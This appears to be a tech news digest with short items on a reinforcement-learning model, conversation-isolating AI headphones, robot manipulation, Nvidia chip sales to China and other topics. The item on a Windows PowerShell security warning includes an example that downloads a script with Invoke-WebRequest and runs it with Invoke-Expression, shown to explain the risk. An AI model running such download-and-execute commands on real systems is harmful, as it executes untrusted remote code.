
New model frames human reinforcement learning in the context of memory and habits

Humans and most other animals are known to be strongly driven by expected rewards or adverse consequences. The process of acquiring new skills or adjusting behaviors in response to these outcomes is known as reinforcement learning (RL).

RL has been widely studied over the past decades and has also been adapted to train computational models, including deep learning algorithms. Existing models of RL link this type of learning to dopaminergic pathways, neural pathways that respond to differences between expected and experienced outcomes (reward prediction errors).
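As a rough illustration of that prediction-error mechanism (a textbook sketch, not taken from Collins’s paper; the learning rate and reward sequence are made-up values):

```powershell
# Classic reward-prediction-error update: the expectation moves toward
# experience in proportion to how surprising each outcome is.
$value   = 0.0              # current expected reward for an action
$alpha   = 0.1              # learning rate
$rewards = 0, 1, 1, 0, 1    # outcomes observed across trials (illustrative)

foreach ($r in $rewards) {
    $delta = $r - $value              # prediction error: experienced minus expected
    $value = $value + $alpha * $delta # nudge the expectation toward experience
    "reward=$r  error=$([Math]::Round($delta, 3))  new expectation=$([Math]::Round($value, 3))"
}
```

Each trial nudges the expectation toward what actually happened; dopaminergic activity is thought to track the `$delta` term.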

Anne G. E. Collins, a researcher at the University of California, Berkeley, recently developed a new model of RL specific to situations in which people’s choices have uncertain, context-dependent outcomes and they must learn which actions lead to rewards. Her paper, published in Nature Human Behaviour, challenges the assumption that existing RL algorithms faithfully mirror the underlying psychological and neural mechanisms.

AI headphones automatically learn who you’re talking to—and let you hear them better

Holding a conversation in a crowded room often leads to the frustrating “cocktail party problem,” or the challenge of separating conversation partners’ voices from the surrounding hubbub. It’s a mentally taxing situation that hearing impairment can exacerbate.

As a solution to this common conundrum, researchers at the University of Washington have developed smart headphones that proactively isolate all the wearer’s conversation partners in a noisy soundscape. The headphones are powered by an AI model that detects the cadence of a conversation and another model that mutes any voices that don’t follow that pattern, along with other unwanted background noises. The prototype uses off-the-shelf hardware and can identify conversation partners using just two to four seconds of audio.

The system’s developers think the technology could one day help users of hearing aids, earbuds and smart glasses to filter their soundscapes without the need to manually direct the AI’s “attention.”
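The article does not detail either model’s internals, so the following is only a hypothetical sketch of the turn-taking intuition it describes: speakers whose voice activity alternates with the wearer’s are treated as partners, while voices that overlap at chance are muted. The speaker names, intervals and the 0.2 threshold are all invented for illustration.

```powershell
# Hypothetical heuristic -- the UW system uses learned neural models, not this rule.
# Idea: conversation partners take turns with the wearer, so their speech rarely
# overlaps the wearer's speech; bystander speech overlaps at chance.

function Get-OverlapSeconds($a, $b) {
    # Total overlap, in seconds, between two lists of (start, end) intervals.
    $total = 0.0
    foreach ($x in $a) {
        foreach ($y in $b) {
            $o = [Math]::Min($x[1], $y[1]) - [Math]::Max($x[0], $y[0])
            if ($o -gt 0) { $total += $o }
        }
    }
    $total
}

# Voice-activity intervals (seconds) from a short audio window -- made-up numbers.
$wearer = @(@(0.0, 2.0), @(4.0, 6.0))
$others = @{
    voiceA = @(@(2.1, 3.9), @(6.2, 8.0))   # alternates with the wearer
    voiceB = @(@(0.5, 5.5), @(6.0, 7.5))   # talks over everyone
}

foreach ($name in $others.Keys) {
    $talk    = ($others[$name] | ForEach-Object { $_[1] - $_[0] } | Measure-Object -Sum).Sum
    $overlap = Get-OverlapSeconds $wearer $others[$name]
    $verdict = if ($overlap / $talk -lt 0.2) { 'keep (partner)' } else { 'mute (bystander)' }
    '{0}: {1:N1}s overlap of {2:N1}s speech -> {3}' -f $name, $overlap, $talk, $verdict
}
```

A real system would make this decision from a few seconds of raw audio, as the prototype does, rather than from precomputed intervals; the sketch only shows why turn-taking cadence is a usable signal.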

Infant-inspired framework helps robots learn to interact with objects

Over the past decades, roboticists have introduced a wide range of advanced systems that can move around in their surroundings and complete various tasks. Most of these robots can effectively collect images and other data from their environment, using computer vision algorithms to interpret them and plan their future actions.

In addition, many robots leverage large language models (LLMs) or other natural language processing (NLP) models to interpret instructions, make sense of what users are saying and respond to them in natural language. Despite their ability to both make sense of their surroundings and communicate with users, most robotic systems still struggle with tasks that require them to touch, grasp and manipulate objects, or come into physical contact with people.

Researchers at Tongji University and the State Key Laboratory of Intelligent Autonomous Systems recently developed a new infant-inspired framework designed to improve the process through which robots learn to physically interact with their surroundings.

Windows PowerShell now warns when running Invoke-WebRequest scripts

Microsoft says Windows PowerShell now warns when running scripts that use the Invoke-WebRequest cmdlet to download web content, aiming to prevent potentially risky code from executing.

As Microsoft explains, this mitigates a high-severity PowerShell remote code execution vulnerability (CVE-2025-54100) that primarily affects enterprise and IT-managed environments, where PowerShell scripts are widely used for automation; such scripts are far less common elsewhere.

The warning has been added to Windows PowerShell 5.1, the version installed by default on Windows 10 and Windows 11 systems, and is designed to bring it the same secure web parsing already available in PowerShell 7.
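Microsoft has not published the exact heuristics here, but the pattern such a warning targets is a script that fetches remote content and then executes it. A minimal sketch of that risky pattern (the URL is a placeholder, and piping the result into Invoke-Expression is our illustrative assumption):

```powershell
# Download-and-execute: the kind of Invoke-WebRequest usage the new warning flags.
# The URL is a placeholder; executing whatever a server returns is exactly the risk.
$response = Invoke-WebRequest -Uri 'https://example.com/setup.ps1' -UseBasicParsing
Invoke-Expression $response.Content
```

-UseBasicParsing is relevant on Windows PowerShell 5.1, where Invoke-WebRequest’s default response parsing historically relied on Internet Explorer components; PowerShell 7 dropped that dependency, which is presumably the “secure web parsing” being backported.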

Nvidia can sell the more advanced H200 AI chip to China — but will Beijing want them?

Nvidia has approval from the U.S. government to sell its more advanced H200 AI chips to China. But the question is whether Beijing wants them, or will let companies buy them.

The company can now ship its H200 chip to “approved customers”, provided the U.S. government gets a 25% cut of those sales. Nvidia had been effectively banned from selling any semiconductors to China earlier this year, but since July it has sought to resume sales of the H20, a less advanced chip designed specifically to comply with export restrictions.

Reports had suggested Beijing prohibited local companies from buying the H20, and Nvidia is not baking large China sales into its forecasts as a result. After the ban was lifted, the Financial Times reported that China would “limit access” to the H200, citing unidentified sources.

Google CEO Sundar Pichai hints at building data centres in space; Elon Musk replies


Digital twins for personalized treatment in uro-oncology in the era of artificial intelligence

This Review focuses on the clinical effects and translational potential of digital twin applications in uro-oncology, highlights challenges and discusses future directions for implementing digital twins to achieve personalized uro-oncological diagnostics and treatment.
